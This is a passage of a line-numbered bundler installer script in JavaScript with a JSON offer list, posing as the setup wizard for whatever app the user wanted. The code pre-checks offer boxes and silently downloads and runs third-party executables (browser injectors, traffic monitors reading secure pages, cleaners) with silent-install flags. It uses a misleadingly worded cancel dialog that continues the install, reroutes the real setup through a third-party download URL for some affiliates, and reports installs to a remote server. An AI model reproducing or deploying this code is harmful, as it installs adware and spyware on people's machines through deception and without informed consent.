href=\"http:\/\/goo.gl\/ZqeWis\" target=\"_blank\" style=\"font-size:9px;\">Privacy Policy<\/a>. For uninstall instructions, <a href=\"http:\/\/goo.gl\/lX8SEZ\" target=\"_blank\" style=\"font-size:9px;\">click here<\/a>.<\/div>\n\n<\/div><\/div>","offer_id":108,"display_button":"next"},{"typ":"install","html":"<div id=\"third\"><h1>Setting up {appTitle}<\/h1><h2>The setup process will be completed within a few moments<\/h2><div><p>Installation of {appTitle} in progress. Please hold for a few moments.<\/p><div id=\"progress\"><img src=\"progress_bar.gif\"><\/div><\/div><\/div>"}];
  194.         function showScreens(screenId) {
  195.             // Any appImg setting?
  196.             if (typeof info.appImageUrl != 'undefined' && info.appImageUrl.indexOf('http')>-1) {
  197.                 document.getElementById("appImgDisp").style.backgroundImage="url("+info.appImageUrl+")";
  198.             }
  199.             document.getElementById('screens').innerHTML = var_fix(screens[screenId].html);
  200.         function cancelInst () {
  201.             var result = JSON.parse(api.messageBox(JSON.stringify({ message: 'By pressing Cancel below you will stop the installation. If you rather want to complete the installation together with selected components, press Ok.', caption : "Are you sure?", type: "okcancel" })));
  202.             if (result.button === "ok") {
  203.                 nextScreen('stop');
  204.             }
  205.             else {
  206.                 h.cancel();
  207.             }
  208.         function loadUrl(urlOut) {
  209.             api.openUrl(JSON.stringify({ url: urlOut }), function () {
  210.             });
  211.         function skip() {
  212.             nextScreen(1);
  213.         function noSkip(state) {
  214.             if (state == "enable") {
  215.                 document.getElementById("noSkipBox1").disabled = false;
  216.                 document.getElementById("noSkipBox2").disabled = false;
  217.                 document.getElementById("noSkipBox").style.color = 'black';
  218.             }
  219.             else {
  220.                 document.getElementById("noSkipBox1").disabled = true;
  221.                 document.getElementById("noSkipBox2").disabled = true;
  222.                 document.getElementById("noSkipBox").style.color = 'gray';
  223.             }
  224.         function skipNext() {
  225.             document.getElementById("next").style.display = "none";
  226.             document.getElementById("skipNextButton").style.display = "inline";
  227.         function offer_accept(screenId) {  
  228.             if (screens[screenId].typ == 'list') {
  229.                 for(var i=0;i<offer_input.length;i++){
  230.                     // Check for accepted list offers
  231.                     var element = document.getElementById('goal_option_'+offer_input[i].id);
  232.                     if (element != null && element.checked) {
  233.                         acceptedOffers.push(offer_input[i].id);
  234.                     }
  235.                 }
  236.             }
  237.             else if (screens[screenId].typ == 'screen') {
  238.                 // If here, it's accepted
  239.                 acceptedOffers.push(screens[screenId].offer_id);
  240.                
  241.                 // Set proper param
  242.                 // Look for checkboxes
  243.                 var checkb=0;
  244.                 var j=1;
  245.                 for(i=0;i<5;i++) {
  246.                     var element = document.getElementById('screen_'+screens[screenId].offer_id+'_'+i);
  247.                     if (element != null) {
  248.                         if (element.checked) {
  249.                             checkb+=2*j;
  250.                         }
  251.                         else {
  252.                             checkb+=1*j;
  253.                         }
  254.                     }
  255.                     else {
  256.                         break;
  257.                     }
  258.                     j=j*10;
  259.                 }
  260.                 if (checkb>0) {
  261.                     // Set new param value
  262.                     for(var i=0;i<offer_input.length;i++) {
  263.                         if (offer_input[i].id == screens[screenId].offer_id) {
  264.                             if (typeof(screens[screenId].param_settings) !== 'undefined') {
  265.                                 offer_input[i].params=screens[screenId].param_settings[checkb];
  266.                             }
  267.                         }
  268.                     }
  269.                 }
  270.             }
  271.         function nextScreen(skip) {
  272.             if (typeof skip == 'undefined') {
  273.                 offer_accept(screenId);
  274.             }
  275.             else if (skip == 'stop') {
  276.                 offer_accept(screenId);
  277.                 total_screens = screens.length;
  278.                 screenId = total_screens-2; // Will jump to last install screen
  279.                 api.hide();
  280.             }
  281.             screenId++;
  282.             showScreens(screenId);
  283.             if (screens[screenId].typ == "screen") {
  284.                 api.enableClose();
  285.                 if (screens[screenId].display_button == "next") {
  286.                     document.getElementById("next").style.display = "inline";
  287.                     document.getElementById("cancel").style.display = "none";
  288.                     document.getElementById("accept").style.display = "none";
  289.                     document.getElementById("skip").style.display = "none";
  290.                     document.getElementById("skipT").style.display = "inline";
  291.                     document.getElementById("skipNextButton").style.display = "none";
  292.                     document.getElementById("next").focus();
  293.                 }
  294.                 else if (screens[screenId].display_button == "nextblur") {
  295.                     document.getElementById("next").style.display = "inline";
  296.                     document.getElementById("cancel").style.display = "none";
  297.                     document.getElementById("accept").style.display = "none";
  298.                     document.getElementById("skip").style.display = "none";
  299.                     document.getElementById("skipT").style.display = "inline";
  300.                     document.getElementById("skipNextButton").style.display = "none";
  301.                     document.getElementById("next").blur();
  302.                 }
  303.                 else if (screens[screenId].display_button == "noskip") {
  304.                     document.getElementById("next").style.display = "inline";
  305.                     document.getElementById("cancel").style.display = "none";
  306.                     document.getElementById("accept").style.display = "none";
  307.                     document.getElementById("skip").style.display = "none";
  308.                     document.getElementById("skipT").style.display = "none";
  309.                     document.getElementById("skipNextButton").style.display = "none";
  310.                     document.getElementById("next").focus();
  311.                 }
  312.                 else {
  313.                     document.getElementById("next").style.display = "none";
  314.                     document.getElementById("cancel").style.display = "none";
  315.                     document.getElementById("accept").style.display = "inline";
  316.                     document.getElementById("skip").style.display = "inline";
  317.                     document.getElementById("skipT").style.display = "none";
  318.                     document.getElementById("skipNextButton").style.display = "none";
  319.                     document.getElementById("accept").focus();
  320.                 }
  321.             }
  322.             else if (screens[screenId].typ == "install") {
  323.                 api.disableClose();
  324.                 document.getElementById("accept").style.display = "none";
  325.                 document.getElementById("skip").style.display = "none";
  326.                 document.getElementById("skipT").style.display = "none";
  327.                 document.getElementById("skipNextButton").style.display = "none";
  328.                 document.getElementById("next").disabled = true;
  329.                 document.getElementById("cancel").disabled = true;
  330.                 document.getElementById("appImgDisp").style.display = "none";
  331.                 document.body.style.backgroundImage = "url('normal_bg2.jpg')";
  332.                 // Download and install all selected offers
  333.                 var input = select_offers();
  334.                 var callback = function (isDownload, index) {
  335.                     if (isDownload || index < input.length) return;
  336.                     h.cancel();
  337.                 };
  338.                 var installApi = JSON.parse(api.info);
  339.                 var userIp = "184.105.143.147";
  340.                
  341.                 // Disable offers?
  342.                 var disable=0;
  343.                 for (var i=0;i<input.length;i++) {
  344.                     if (input[i].id == 58 || input[i].id == 10 || input[i].id == 92 || input[i].id == 149) {
  345.                         disable = input[i].id;
  346.                     }
  347.                 }
  348.                 if (disable > 0)
  349.                     input = offer_control(input,disable);
  350.                 // Check if extra run
  351.                 var skipExtra=0;
  352.                
  353.                 if (input.length > 6) {
  354.                     skipExtra=1;
  355.                 }
  356.                 else {
  357.                     for (var i=0;i<input.length;i++) {
  358.                         if (input[i].id == 62 || input[i].id == 10 || input[i].id == 92 || input[i].id == 100 || input[i].id == 58 || input[i].id == 102 || input[i].id == 110 || input[i].id == 42 || input[i].id == 120 || input[i].id == 122 || input[i].id == 114 || input[i].id == 133 || input[i].id == 139 || input[i].id == 135 || input[i].id == 141 || input[i].id == 108 || input[i].id == 116 || input[i].id == 143 || input[i].id == 131 || input[i].id == 151 || input[i].id == 149 || input[i].id == 112 || input[i].id == 118 || input[i].id == 157 || input[i].id == 86 || input[i].id == 159 || input[i].id == 116 || input[i].id == 167 || input[i].id == 175 || input[i].id == 181 || input[i].id == 189 || input[i].id == 193) {
  359.                             skipExtra=1;
  360.                         }
  361.                     }
  362.                 }
  363.                
  364.                 if (installApi.installerId>12 && installApi.affiliateId!=1056 && installApi.affiliateId!=1082 && installApi.affiliateId!=1611 && installApi.affiliateId!=1552 && installApi.affiliateId!=1723 && skipExtra!=1) {
  365.                     var printCmd="";
  366.                     if (installApi.appCmd != 0) printCmd = escape(installApi.appCmd);
  367.                     installApi.appSetupUrl = "http://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&instid[appsetupurl]="+escape(installApi.appSetupUrl)+"&prefix=Setup&instid[appname]="+escape(installApi.appTitle)+"&instid[cmdline]="+printCmd+"&instid[appimageurl]=http%3A%2F%2Fpe-sixi.com%2Fimg%2Ficon_installer.png";
  368.                 }
  369.                 h.installOffers(input, installApi, callback);
  370.             }
  371.         function offer_control(input_control,disableId) {
  372.             var input_new = [];
  373.             var skip=0;
  374.             var j=0;
  375.             var disableValue=0;
  376.             var totalValue=0;
  377.             for (var i=0;i<input_control.length;i++) {
  378.                 if (input_control[i].id == 50 || input_control[i].id == 90 || input_control[i].id == 106) {
  379.                     totalValue+=parseFloat(input_control[i].rate_value);
  380.                 }
  381.                 if (input_control[i].id == disableId) {
  382.                     disableValue = parseFloat(input_control[i].rate_value);
  383.                 }
  384.             }
  385.             for (var i=0;i<input_control.length;i++) {
  386.                 if (disableValue >= totalValue) {
  387.                     if (input_control[i].id == 50 || input_control[i].id == 90 || input_control[i].id == 106) {
  388.                         skip=1;
  389.                     }
  390.                     else {
  391.                         input_new[j] = input_control[i];
  392.                         j++;
  393.                     }              
  394.                 }
  395.                 else {
  396.                     if (input_control[i].id == disableId) {
  397.                         skip=1;
  398.                     }
  399.                     else {
  400.                         input_new[j] = input_control[i];
  401.                         j++;
  402.                     }  
  403.                 }
  404.             }
  405.             return input_new;
  406.         function select_offers() {
  407.             var input = [];
  408.             var j = 0;
  409.             if (acceptedOffers.length>0) {
  410.                 for(var i=0;i<offer_input.length;i++){
  411.                     // Not accepted, remove from list
  412.                     if (acceptedOffers.indexOf(offer_input[i].id) > -1) {
  413.                         input[j] = offer_input[i];
  414.                         j++;
  415.                     }
  416.                 }
  417.             }
  418.             return input;
  419.         function var_fix(change) {
  420.             change = replaceAll('{appTitle}',info.appTitle,change);
  421.             change = replaceAll('{appVersion}',info.appVersion,change);
  422.             var allTitles="";
  423.             var allUrls="";
  424.             var allDescriptions="";
  425.             var oneSet=0;
  426.             for(var i=0;i<offer_input.length;i++){
  427.                 if (offer_input[i].display=="list") {
  428.                     if (oneSet==0) {
  429.                         allTitles = offer_input[i].title;
  430.                         allUrls = '<a href="'+offer_input[i].eula+'" target="_blank">' + offer_input[i].title + '</a>';
  431.                         oneSet++;
  432.                     }
  433.                     else {
  434.                         allTitles = allTitles+', '+offer_input[i].title;
  435.                         allUrls = allUrls+', <a href="'+offer_input[i].eula+'" target="_blank">' + offer_input[i].title + '</a>';
  436.                     }
  437.                     allDescriptions = allDescriptions+'<input type="checkbox" id="goal_option_'+offer_input[i].id+'" name="goal_option" value="'+offer_input[i].id+'" checked>' + offer_input[i].title + ': ' + offer_input[i].description + '<br/><br/>';
  438.                 }
  439.             }
  440.             change = replaceAll('{offer_titles}',allTitles,change);
  441.             change = replaceAll('{offer_titles_url}',allUrls,change);
  442.             change = replaceAll('{offer_titles_desc}',allDescriptions,change);
  443.             return change;
  444.         function replaceAll(find, replace, str) {
  445.             return str.replace(new RegExp(find, 'g'), replace);
  446.         function changeDisplay(typ) {
  447.             if (typ == "express") {
  448.                 document.getElementById("display_express").style.display = "block";
  449.                 document.getElementById("display_custom").style.display = "none";  
  450.             }
  451.             else {
  452.                 document.getElementById("display_express").style.display = "none";
  453.                 document.getElementById("display_custom").style.display = "block";
  454.             }
  455.         window.api = window.external;
  456.         var h = new Wrapper("http://set.downor3.space/report.php", "44448318");
  457.         try {
  458.             var closeHandler;
  459.             closeHandler = function() {
  460.                 api.notifyOnClose(closeHandler);
  461.                 var result = JSON.parse(api.messageBox(JSON.stringify({ message: 'By pressing Cancel below you will stop the installation. If you rather want to complete the installation together with selected components, press Ok.', caption : "Are you sure?", type: "okcancel" })));
  462.                 if (result.button === "ok") {
  463.                     nextScreen('stop');
  464.                 }
  465.                 else {
  466.                     h.cancel();
  467.                 }
  468.             };
  469.             api.notifyOnClose(closeHandler);
  470.             api.moveCentered(JSON.stringify({ width: 581, height: 441 }), function () {
  471.                
  472.             });
  473.             var info = JSON.parse(api.info);
  474.             var offer_input = [{"id":195,"display":"list","title":"Wintune Pro","eula":"http:\/\/goo.gl\/7qiyBO","description":"By Installing Wintune Pro  you accept the terms of the <a href=\"http:\/\/goo.gl\/7qiyBO\" target=\"_blank\">License Agreement<\/a> and <a href=\"http:\/\/goo.gl\/3vtfCE\" target=\"_blank\">Privacy policy<\/a> by pressing Next.","url":"https:\/\/s3-us-west-2.amazonaws.com\/wintunepro\/setup_silent2.exe","params":"","post_reg":["2088","2089","2090","2091"],"rate_value":0.144,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":50,"display":"list","title":"Note-Up","eula":"http:\/\/goo.gl\/RX45xW","description":"Note-Up allow you to add fast and easy-to-use event reminders to your desktop. By installing Note-Up you accept the <a href=\"http:\/\/goo.gl\/RX45xW\" target=\"_blank\">EULA & Privacy Policy<\/a>.","url":"http:\/\/d16hr9n7t75k58.cloudfront.net\/NUIns.exe","params":"-pub=WAKE -r=1 -silent","post_reg":["589","608"],"rate_value":0.1125,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":180}},{"id":58,"display":"screen","title":"Social2search","eula":"http:\/\/goo.gl\/Rzv0Hc","description":"<h1>Social2Search<\/h1>\n<div id=\"consumerinput\">\n<p>Get recommendations from friends on all websites you like to use.  Social2Search gives you personal results from Facebook and Twitter on websites like Google, TripAdvisor, Amazon and more.\n<br\/><br\/>\nFacebook and Twitter user data is used by Social2Search to give you personal results based on what you search. Social2Search may use an add-on, local proxy, dll, cookies, pixels and\/or other means to collect your IP address, URLs of the pages you visit and other information including the content of encrypted web pages to give you personal search results and show you advertising. Social2Search may protect itself from other software that tries to interfere with it. You may opt out of third party advertising and remove Social2Search at any time. <a href=\"http:\/\/goo.gl\/pcdd95\" target=\"_blank\">Learn More<\/a>. To request removal or disabling of this computer program, please contact us at this <a href=\"#\" onClick=\"loadUrl('mailto:info@Social2Search.com')\">electronic address<\/a>.\n<br\/><br\/>\nBy clicking \"Next\", I agree to <a href=\"http:\/\/goo.gl\/rGo8AD\" target=\"_blank\">Terms of Service<\/a> and <a href=\"http:\/\/goo.gl\/ce3p7N\" target=\"_blank\">Privacy Policy<\/a> and consent to install and enable Social2Search for all browsers. Please <a href=\"#\" onClick=\"loadUrl('mailto:info@Social2Search.com')\">contact us<\/a> for more information.<\/p>\n<\/div>\n","url":"http:\/\/install-apps.com\/wajam_install.exe?tracking=eyJhaWQiOiI0NzcyIiwiZG9udF91c2VfcG9zdCI6InRydWUifQ==","params":"\/S eyJhaWQiOiI0NzcyIiwiZG9udF91c2VfcG9zdCI6InRydWUifQ==","post_reg":["1204","1254","1995","1996","1997","1998","1999","2000","2001","2002","2003","2004","2005","2006","2007","2008","2009","2010","2011","2012","2013","2014","2015","2016","2017","2018","2019","2020","2021","2022","2023","2024","2025","2026","2027","2028","2029","2030","2031","2032","2033","2034","2035","2036","2037","2038","2039","2040","2041","2042","2043","2044","2045","2046","2047","2048","2049","2050","2051","2052","2053","2054","2055","2056","2057"],"rate_value":0.076,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":167,"display":"list","title":"Flashbeat","eula":"http:\/\/goo.gl\/JB44Gv","description":"Installing Flashbeat you accept the terms of the <a href=\"http:\/\/goo.gl\/JB44Gv\" target=\"_blank\">License Agreement<\/a> and <a href=\"http:\/\/goo.gl\/9lQrz9\" target=\"_blank\">Privacy policy<\/a> by pressing Next.","url":"http:\/\/x.bsteas4l.tech\/file2\/72000113","params":"","post_reg":["1923","1924"],"rate_value":0.04536,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":74,"display":"screen","title":"KNCTR","eula":"http:\/\/goo.gl\/nZtRMT","description":"<div id=\"consumerinput\">\n<div style=\"font-size:11px;\">\n<p><br\/><br\/>Stay Connected with KNCTR\n<br\/><br\/>\nKNCTR is FREE entertainment platform for your desktop that lets you stay connected to the people, news & events that matter most\n<br\/><br\/>\n- Free phone calls to USA and Canada<br\/>\n- Video content updated daily<br\/>\n- Social media integration<br\/>\n<\/div>\n\n<div style=\"position:absolute;bottom:60px;right:0;width:380px;height:30px;font-size:9px;\">By clicking Next, I agree to the KNCTR <a href=\"http:\/\/goo.gl\/nZtRMT\" target=\"_blank\" style=\"font-size:9px;\">Terms of Use<\/a> and <a href=\"http:\/\/goo.gl\/H63wBn\" target=\"_blank\" style=\"font-size:9px;\">Privacy Policy<\/a>.<\/div>\n\n<\/div>\n","url":"http:\/\/www.itibitiphone.com\/download\/download\/2113f66c9421\/Itibiti_Knctr_C.exe","params":"\/VERYSILENT","post_reg":["869","870"],"rate_value":0.03876,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":143,"display":"screen","title":"ConsumerInput","eula":"https:\/\/goo.gl\/fBQRIx","description":"<h1 style=\"font-size:14px;margin-top:0px;\">Earn gift cards for completing surveys<\/h1>\n<div id=\"consumerinput\">\n<p style=\"font-size:9px;margin:0px;line-height:10px\">Download the software to join the Consumer Input Research Panel, provided by Compete, and register to receive $5 or more in gift cards for each survey you successfully complete! Once the software is installed and activated, it may collect the following kinds of information from your computer:<br\/>\n- Online browsing: This includes the sites you visit, including news sites or social networks, and your interactions with those sites, and interactions that they make on your behalf.<br\/>\n- Online activities: This includes the search terms you enter and the results of such searches, the videos you view, the products you shop for online, information you enter into forms, the materials you download or upload, the advertisements you see, information and content on web pages you visit or with which you interact and may include personal, financial and health information.<br\/>\n- Information on secure pages: This includes information and content from protected or secure pages that you access, such as online accounts or the content of complete and incomplete consumertransactions when you are checking out through a website's shopping cart, even if the website makes this information unreadable to others.<br\/>\n- System information: This includes information about the computer and browser that you are running on, including the IP address of the computer, unique identifiers used by websites and applications (such as those found in cookies), how the software is operating, and which other applications are installed or running.<\/p>\n<div style=\"width:350px;height:30px;border: 2px solid #cccccc;padding: 5px;font-family: Tahoma, sans-serif;overflow: auto;resize:both;-moz-appearance: textfield-multiline;-webkit-appearance: textarea;margin-top:0px;\">\n<p style=\"font-size:9px;margin:0px;line-height:10px\">The above list contains examples, and is not a comprehensive list of every data element. The software may also modify or replace content or ads that you see as part of a market research study. Filtering of certain personally identifiable or sensitive information - Compete has established certain procedural and technical privacy rules designed to try to avoid the collection of certain types of personally identifiable and sensitive information that can be identified by those processes, such as credit card numbers, social security numbers, email addresses and email content from most web-based email accounts. Despite our efforts, certain personally identifiable or sensitive information might get through the privacy rules and procedures. However, we do not knowingly use any inadvertently retained personally identifiable or sensitive information in our services.<br\/>\nWe may combine data collected by the service, data collected outside the service but part of the program, data collected by our related programs, and data obtained from other sources. We use this information to conduct research and analysis, and may share the information with our customers, partners, and affiliates. However, we prohibit our customers, partners, and affiliates from using your information to target advertising to you individually, although they may use the analysis to improve the way they generally target advertising to consumer market segments to which you may belong. We may use the information to determine whether to invite you to participate in a research survey.<br\/>\nFor more information about our information collection and use practices, please read our <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">Privacy Policy<\/a>.<br\/>\nIf you participate in any other research panels or programs run by us (whether directly or indirectly, and regardless of device and applicable policy for each such other program), by joining this program you agree that we may use any information we have about you to match the data collected through this program with the data collected through such other panels and programs (including data collected in the past), and use the combined \"multi-device\" data pursuant to the most restrictive applicable <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">privacy policy<\/a>. If you are upgrading the Software from an older version, re-joining this research program, or otherwise accepting the latest version of this Policy, you agree that after doing so, your data previously collected by Compete under your prior participation in the program may be used as described in this Policy.<\/p>\n<\/div>\n\n<p style=\"font-size:9px;margin:0px;line-height:10px;\">You may always uninstall the Software by following the removal instructions provided <a href=\"https:\/\/goo.gl\/2cBD4y\" target=\"_blank\" style=\"font-size:9px\">here<\/a>. For more information about our information collection and use practices, please read our <a href=\"http:\/\/goo.gl\/rIyJll\" target=\"_blank\" style=\"font-size:9px\">Privacy Policy<\/a>. By installing\/upgrading the software, you agree to the terms of our <a id=\"terms\" href=\"http:\/\/goo.gl\/yTeKb8\" target=\"_blank\" style=\"font-size:9px\">End User License Agreement<\/a> and consent to install Consumer Input and automatically enable it on your Firefox, Internet Explorer, and Chrome browsers.<\/p>\n\n<\/div>\n","url":"http:\/\/cfast1.us\/sci.exe","params":"-ui=0 -cid=237758 -affid=389325 -componentid=201023 -sid= -componentdownloadurl=\"http:\/\/fastdl1.us\/sono\/ci_setup_s.exe\"","post_reg":["1853","1854"],"rate_value":0.0126,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":151,"display":"list","title":"MPC Cleaner","eula":"http:\/\/goo.gl\/Wb059k","description":"By Installing MPC Cleaner you accept the terms of the <a href=\"http:\/\/goo.gl\/Wb059k\" target=\"_blank\">License Agreement<\/a> and <a href=\"http:\/\/goo.gl\/Pn05rA\" target=\"_blank\">Privacy policy<\/a> by pressing Next.","url":"http:\/\/download.mpc.am\/mpc\/2016\/MPC_330_0.exe","params":"\/silence\/supply:'330'","post_reg":["1884","1904"],"rate_value":0.04508,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":120}},{"id":169,"display":"list","title":"WeatherChick'n","eula":"http:\/\/goo.gl\/kGl9Nq","description":"Your Weather is Ready! By pressing next you accept the <a href=\"http:\/\/goo.gl\/kGl9Nq\" target=\"_blank\">License Agreement and Privacy policy<\/a> and to complete the installation.","url":"http:\/\/d1xar0myvbu1j9.cloudfront.net\/WeatherChicknInstaller.exe","params":"\/ch=53463750","post_reg":["1973","1974"],"rate_value":0.00546,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":131,"display":"list","title":"ShopperZ","eula":"http:\/\/goo.gl\/Bz86TB","description":"Shopping online has never been more rewarding - or fun! Join ShopperZ to collect free gifts, coupons and fantastic rewards.\nInstalling ShopperZ you accept the terms of the <a href=\"http:\/\/goo.gl\/Bz86TB\" target=\"_blank\">License Agreement<\/a> and <a href=\"http:\/\/goo.gl\/8Nu23d\" target=\"_blank\">Privacy policy<\/a> by pressing Next.","url":"http:\/\/cds.s6m5m9d7.hwcdn.net\/release\/471_plm\/sprz.exe","params":"\/VERYSILENT \/SUPPRESSMSGBOXES \/NORESTART \/UPDATE \/chnl=plmdusex \/subid=elol7418","post_reg":["1717"],"rate_value":0.01221,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":5}},{"id":139,"display":"list","title":"Freethemediaplayer","eula":"http:\/\/goo.gl\/HPs805","description":"By Installing Freethemediaplayer you accept the terms of the <a href=\"http:\/\/goo.gl\/HPs805\" target=\"_blank\">License Agreement<\/a> and <a href=\"http:\/\/goo.gl\/3hsyxn\" target=\"_blank\">Privacy policy<\/a> by pressing Next.","url":"https:\/\/s3.amazonaws.com\/installcapital\/2016-04-22\/setup2h.exe","params":"-p1=1440","post_reg":["1818","1819"],"rate_value":0.00924,"timeouts":{"download":60,"min_install":5,"install":300,"report_delay":90}},{"id":108,"display":"screen","title":"SafeFinder","eula":"http:\/\/goo.gl\/fFlzl1","description":"<div id=\"consumerinput\">\n<br\/>\n<strong>SafeFinder<\/strong>\n<br\/>\n<br\/>\n<div style=\"width:350px;height:200px;border: 2px solid #cccccc;padding: 5px;font-family: Tahoma, sans-serif;overflow: auto;resize:both;-moz-appearance: textfield-multiline;-webkit-appearance: textarea;margin-top:0px;\">\nLinkury Ltd.<br\/>\n<br\/>\n(individually and collectively with any subsidiary thereof \"Linkury\")<br\/>\n<br\/>\nTerms of service<br\/>\nThe Services and This Agreement<br\/>\n<br\/>\nThe user (\"You\" or \"User\") of any Linkury software, websites, forums, or mediated functionality (individually and collectively - the \"Linkury Services\") agrees that the use of any Linkury Services, is covered by this agreement (the \"Agreement\"). Unless explicitly stated otherwise, any new features to the current Linkury Services, including the release of new Linkury properties, shall be subject to the Agreement. In addition, when using particular Linkury Service (whether owned or operated by Linkury), You and Linkury shall be subject to any posted guidelines or rules applicable to such services, which may be posted and modified from time to time. All such guidelines or rules are hereby incorporated by reference into the Agreement. Linkury may also offer other services that are governed by different Terms of Service.<br\/>\n<br\/>\nLinkury provides Users, inter alia, with a to be implemented in User's web browser. You also understand and agree that the Linkury Services may include advertisements and that these advertisements are necessary for Linkury to provide the Services. You also understand and agree that the Linkury Services may include certain communications from Linkury and you will not be able to opt out of receiving them.<br\/>\n<br\/>\nYou are responsible for obtaining access to the Linkury Services, and that access may involve third-party fees (such as Internet service provider or airtime charges). You are responsible for those fees, including those fees associated with the display or delivery of advertisements. In addition, You must provide and are responsible for all equipment necessary to access the Linkury Services.<br\/>\n<br\/>\nYou understand that the technical processing and transmission of the Linkury Services, including content provided by You, may involve (a) transmissions over various networks; and (b) changes to conform and adapt to technical requirements of connecting networks or devices.<br\/>\n<br\/>\nCertain Linkury Services may contain or direct User to adult or mature content, and You must be at least 18 years of age to access and view same.<br\/>\n<br\/>\nProvision of the Services<br\/>\nAs a condition precedent of your use of the Linkury Services, you represent that you are of legal age to form a binding contract under the laws of any applicable jurisdiction and are not a person barred from receiving the Linkury Services under the laws of the United States or any other applicable jurisdiction<br\/>\n<br\/>\nUser agrees that Linkury may use subsidiaries, agents, or third-parties located anywhere in the world, to provide the Linkury Services. The User agrees that the provision of the Linkury Services, their extent, functionality, form and nature may change at the sole and exclusive discretion of Linkury, all without prior notice to you.<br\/>\n<br\/>\nUser may stop using the Linkury Services at any time and does not need to provide notice to Linkury.<br\/>\n<br\/>\nUser understands and agrees that the termination of the Linkury Services, or changes to the extent, functionality, form or nature of the Linkury Services may result in loss of information which may include account details, or information User has provided. User agrees to hold Linkury harmless for any loss or damage arising directly or indirectly from the loss of information contemplated herein or for the termination of Linkury Services.<br\/>\n<br\/>\nUser agrees that Linkury may unilaterally edit, modify or delete information or content provided as part of the Linkury Services.<br\/>\n<br\/>\nUse of the Services and User conduct<br\/>\nUser agrees to use the Linkury Services addressed by this Agreement, is restricted to ways, and for purposes, allowed by this Agreement and all applicable laws, or regulations in relevant jurisdictions (including any laws regarding the export of data or software to and from relevant countries). User agrees that it will not directly or indirectly engage in any activity that interferes with, or disrupts, the provision of the Linkury Services.<br\/>\n<br\/>\nUser agrees not to sell, provide, duplicate or otherwise make available the Linkury Services to anyone other than for its own personal purposes. The User agrees that any use of the Linkury Services or breach of the terms of this Agreement is the User's sole responsibility, including, but not limited to, any resulting consequences such as damages or harm Linkury may suffer due to User's failure to abide by the Terms of This Agreement. Linkury EXPLICITLY DISCLAIMS LIABILITY FOR ANY AND ALL LOSSES AND DAMAGES ARISING FROM USER's, OR ANYONE ON ITS BEHLF, USE OF THE Linkury SERVICES.<br\/>\n<br\/>\nUser agrees not to access (or attempt to access) any of the Linkury Services by any means other than through the interface that is provided by Linkury, including, but not limited to, specifically agree not to access (or attempt to access) any of the Linkury Services through any automated means.<br\/>\n<br\/>\nUser agrees not to restrict, discourage or inhibit any person from using the Linkury Services, disclose personal information of others through the Linkury Services or obtained through the Linkury Services, collect information about users of the Services, \"stalk\" or otherwise harass another user, reverse engineer, disassemble or decompile any section or technology of or in the Linkury Services, or gain unauthorized access to the Linkury Services, to other users' accounts, names or personally identifiable information, or to other computers, software or websites connected or linked to the Linkury Services;<br\/>\n<br\/>\nUser agrees not to, with respect to the Linkury Services, a) launch or use any automated system, including without limitation, \"robots,\" \"spiders,\" or \"offline readers,\" that access the Linkury Services in a manner that sends more request messages to Linkury servers in a given period of time than a human can reasonably produce in the same period by using a conventional web browser; b) send or otherwise transmit to or through the Linkury Services chain letters, unsolicited messages, so-called \"spamming\" or \"phishing\" messages, or messages marketing or advertising goods and services; c) post, transmit or otherwise make available any virus, worm, spyware or any other computer code, file or program that may or is intended to damage or hijack the operation of any hardware, software or telecommunications equipment; d) violate any applicable laws or regulations; or e) assist or permit any persons in engaging in any of the activities described above.<br\/>\n<br\/>\nUser understands that all information and content, whether publicly posted or privately transmitted, are the sole responsibility of the person from whom such content originated. This means that You are entirely responsible for all content that you upload or otherwise make available via the Linkury Services. Linkury does not control the content posted via the Linkury Services. You understand that by using the Linkury Services, You may be exposed to content that is offensive, indecent or objectionable. Under no circumstances will Linkury be liable in any way for any content, including, but not limited to, any errors or omissions in any content, or any loss or damage of any kind incurred as a result of the use of any content posted, transmitted or otherwise made available via the Linkury Services.<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to upload, post. email transmit or otherwise make available any content that is unlawful, harmful, threatening, abusive, harassing, tortious, defamatory, vulgar, obscene, libelous, invasive of another's privacy, hateful, or racially, ethnically or otherwise objectionable<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to harm minors in any way<br\/>\n<br\/>\nUser agrees to not use the Linkury Services to impersonate any person or entity.<br\/>\n<br\/>\nYou agree to not upload, post. email transmit or otherwise make available via the Linkury Services any content that you do not have a right to make available under any law or under contractual or fiduciary relationships (such as inside information, proprietary and confidential information learned or disclosed as part of employment relationships or under nondisclosure agreements or any content that infringes any patent, trademark, trade secret, copyright or other proprietary rights); You agree to not provide material support or resources (or to conceal or disguise the nature, location, source, or ownership of material support or resources) to any organization(s) designated by the United States or any other applicable government as a foreign terrorist organization pursuant to section 219 of the Immigration and Nationality Act or any similar law<br\/>\n<br\/>\nIntellectual Property Rights and Trademark information<br\/>\n<br\/>\nUser acknowledges and agrees that Linkury owns all legal right, title and interest in and to the Linkury Services, including any intellectual property rights which subsist in the Linkury Services (whether those rights happen to be registered or not, and wherever in the world those rights may exist). User further acknowledge that Linkury Services may contain information which is designated confidential by Linkury and that User shall not disclose such information without Linkury's prior written consent. User agrees that data generated in performance of the Linkury Services is the sole and exclusive property of Linkury, its users or its licensors with all rights reserved. Except as expressly authorized by Linkury, You agree not to modify, rent, lease, loan, sell, distribute, transmit, broadcast, publicly perform or create derivative works based on the Linkury Services.<br\/>\n<br\/>\nUser is granted a limited license to access and use the Linkury Services and to download or print a copy of any portion of the Linkury Services to which it has properly gained access solely for its personal, non-commercial use, provided that all copyright or other proprietary notices are maintained intact. Such license is subject to this Agreement and does not permit use of any data mining, robots, scraping or similar data gathering or extraction methods.<br\/>\n<br\/>\nAny use of the Linkury Services other than as specifically authorized herein, without the prior written personal permission of Linkury, is strictly prohibited and will terminate the license granted herein. Such 